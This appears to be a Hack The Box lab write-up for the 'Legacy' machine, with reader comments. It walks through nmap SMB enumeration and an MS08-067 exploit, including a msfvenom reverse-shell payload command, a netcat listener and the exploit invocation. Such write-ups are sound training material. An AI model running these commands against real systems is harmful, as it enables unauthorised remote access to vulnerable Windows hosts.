Skip to content

HTB Writeup: Legacy w/o Metasploit

Overview

Recon

Quick Scan:

sudo nmap -sC -sV -O -oN nmap/quickscan.txt 10.129.125.96

Two services are identified:
1. netbios-ssn (port:445, likely to be SMB)
2. microsoft-ds

According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).

nmap results

Enumeration

We can use nmap to check if the machine is vulnerable to any public CVEs.

locate *.nse | grep smb

Run the script to check the vulnerabilities.

sudo nmap –script smb-vuln* -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>

We can also google for exploit relating to Windows XP SP3 and SMB.

From our enumeration, we can try these two exploits:
1. MS08-067
2. MS17-010

Exploit

MS08-067

Convert this script to python3: https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py

Start the netcat listener:

nc -nlvp 443

Get Local Machine IP:

ip addr | grep tun0

Generate the shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Copy the shellcode to exploit.py script.

Run the exploit script (make sure you have pip3 install impacket).

Remember that the machine is Windows XP and likely to be SP3. So let’s choose choice 6.

python3 exploit.py <VICTIM BOX IP ADDR> 6 445

There will be a callback on the listener:

The root.txt is in the Desktop folder.

Reflections on the lab

It took me days to achieve a successful exploit. One of the reason is that I was spending two days on debugging python2 exploit scripts for MS17-010 (eternalblue). There is some issue in using pip2 to install impacket. Therefore I targeted MS08-067 instead.

  • If you are stuck with debugging issue, you need to time-box and move on. You can revisit the issue in the future. Eternalblue is one of the famous NSA exploit. I will definitely need to figure out how to fix the issues when running the exploit script.
  • I confused LHOST as the IP address of the victim box. Instead I should remember that LHOST is the IP address of the local VM.
  • You can enumerate issue using nmap as well and not just with searchsploit.
  • Convert python2 scripts to python3 scripts with online tool such as this.
Published inHack The BoxOSCPWalkthrough

2 Comments

  1. anonymous anonymous

    mate how did you convert the python script to python3?

    • Bobby Lin Bobby Lin

      Hey, you need to convert the print syntax to Python3. You can look for online tools to perform the conversion as well.

Leave a Reply

Your email address will not be published.